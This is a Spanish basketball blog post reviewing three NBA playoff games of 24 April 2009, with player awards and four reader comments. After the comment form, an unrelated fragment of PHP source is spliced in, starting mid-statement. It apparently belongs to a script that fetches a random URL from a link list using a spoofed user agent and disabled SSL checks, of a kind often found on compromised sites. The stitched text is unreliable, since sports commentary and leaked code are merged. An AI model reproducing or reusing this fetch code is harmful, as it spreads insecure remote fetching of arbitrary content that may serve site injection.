Playoffs (24/04/2009): 70% de crédito

25 de April de 2009 por TheDeerHunter

Dice la estadística, que en el 70% de las ocasiones en las que un equipo se lleva el tercer partido tras el 1-1 también se lleva la serie. La importancia cualitativa y psicológica de este tercer choque en una serie igualada es considerable y así nos lo mostraron los que anoche se encontraban en esta situación.

El Orlando @ Philadelphia fue de auténtico infarto. Esos duelos a cara de perro, de playoff del Este de toda la vida. Los Sixers salieron a dar guerra desde el pricipio, rápidos y agresivos, buscando atacar la zona casi obsesivamente como queriendo poner en duda quién narices es el mejor defensor del planeta. Muy poco o nada se notó el efectó intimidador de “Supermán” y de la mano de los Andrés” lograron obtener ventajas de hasta 17 puntos.

Precísamente uno de los defectos que se le pueden achacar al superhombre de Orlando es que no suele ejercer el peso ofensivo que se le presupone. Pero anoche, con un atasco monumental de sus compañeros,  pudimos verle disfrazado de Shaquille O’neal para abanderar la remontada… Pero este gigante azul no tenía ningún Penny Hardaway que le acompañara.

No deja de ser paradójico que, a escasos segundos del final, con el empate en el marcador, le llegara la bola no se sabe muy bien cómo, a un casi inédito Thaddeus Young. Y a éste no se le ocurre otra que lanzarse hacia la zona como si estuviera loco…

Aunque parezca mentira esta es la imagen de una victoria que bien puede valer una segunda ronda…

No tan espectacular, pero sí casi tan emocionante estuvo el Rockets – Blazers. Con las defensas sobre Roy y Yao cada vez más ajustadas la eliminatoria se está resolviendo con el duelo Aldridge – Scola. Bajo ninguna circunstancia me gustaría haberme de jugar las habichuelas contra el argentino . Un 2-1 a su favor con buena parte del mérito en sus espalda y Aldridge descubriendo cómo se las gasta el ex del Tau. Scola recibió anoche la decisiva colaboración de Shane Battier, como también la hubiera recibido Roy de Rudy, de no haber querido tirarse más del doble de tiros que el español, aún con Artest mordiéndole el pescuezo. Meritorio Steve Blake que, con Rudy, fue el que más cabeza le puso al asunto. Se nota la experiencia que tiene el base de Maryland.

Por último, como era previsible Lebron y sus Cavs pusieron a los Pistons al borde de la eliminación. Anoche juguetearon con ellos durante 3 cuartos y medio, para apretar y secarlos durante los últimos minutos. Por destacar algo de un partido sin mucha historia, sensacional la actuación de Joe Smith contra ¿uno de sus ex-equipos? Como para acordarse de todos en los que ha jugado.

PREMIOS TJNBA:

MVP: Podríamos volver a nombrar a Lebron James con sus números habituales, pero hoy vamos a dar un premio de esos compartidos que tanto les gustan a los americanos. MVP ex aequo para André Miller y André Iguadala con 54ptos, 16 rebotes y 11 asistencias (entre ambos) en un partido increíble.

El Rookie: Rudy estuvo impresionante en lo poco que le dejaron hacer. En 22 minutos, 9 lanzamientos que sumaron a su equipo 17 puntos… con 3 asistencias y dos robos es difícil pedirle más.  Con un par más de balones para él no os extrañéis nada de que podríamos estar hablando de otro resultado. Es lo que tiene cuando una estrella manda más que el propio entrenador.

La Sorpresa: No suele ser habitual que Luis Scola sea la primera opción ofensiva de su equipo, aunque ya muy pocos duden de su calidad, talento y capacidad competitiva. Esa es la sorpresa, porque su respuesta  al reto aquí no nos sorprende a ninguno.

La decepción: Entre Turkoglu y Rashard Lewis 7 de 25 y gracias. Una de la claves del 2-1 en contra es sin duda el bajo rendimiento de los segundas espadas de Orlando.

El mayor esfuerzo en vano: 36 puntos y 11 rebotes para Dwight Howard, pero sus 3 tapones no fueron suficientes como para amedrentar las incursiones a la zona de los Sixers.

Comenta

4 comentarios a esta entrada

  1. Josep Àngel Colomés dice:
    #1

    Me encanta Luis Scola, un jugador total, integral y profesional.

    Además hoy Tim Duncan, uno de los más grandes, cumple 33 años. Ved el vídeo que he metido en http://www.nbasl.com. Os recordará momentos estelares de la torre gemela que quería ser nadador pero que ha acabado en la cima de la NBA.

      Citar

  2. Txusma dice:
    #2

    Rudy debe ser el jugador de toda la plantilla de Portland mas acostumbrado a jugar partidos trascendentales. No digo q deba ser la primera espada pero algo deberian pensar para darle aun mas protagonismo. Y ya no digo lo de dejarle a el los tiros decisivos…
    Y Howard mas solo que la una…

    Grande Duncan! Todo el mundo en pie…

      Citar

  3. john dice:
    #3

    Sorry for writing in English as I’m from Malaysia.

    I knew the Rockets will bounced back in Game 3. All they need to do is protect their home court and they will be okay. The win from Game 1 was so crucial so they should screw things up at home.

    I have great respect for the Blazers but they are still young but now lets leave destiny in the hands of the Rockets to full fill that long awaited dream.

    Hats off to Scola was his big performance tonight. Every shot which he nailed was huge and again I’m so happt he got the better of Aldridge. Please check out my match review, and what do you think about the prosoect on Game 4?

      Citar

  4. javi dice:
    #4

    Puff,q mal huele lo de Portland. Viendo el prtido ayer cualquiera se daba cuenta dd quien estaba fino y quien no. Jugartela a que roy meta 42 puntos todos los partidos es una locura pro bueno, el señor Mcmillan sabrá. por lo visto hata ahora en la temprada regular su forma de ver el baloncesto puede valer, ahora en PO…Este tio es cuadrado cuadrado.

    Bastante sorprendente lo de los Sixers a ver si aguantan y pueden dar la gran sorpresa. Howard muy solo y numerazos pro no se, me da la sesación que a pesar de esos numerazos no va a decidir muchos partidos.

    salu2

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>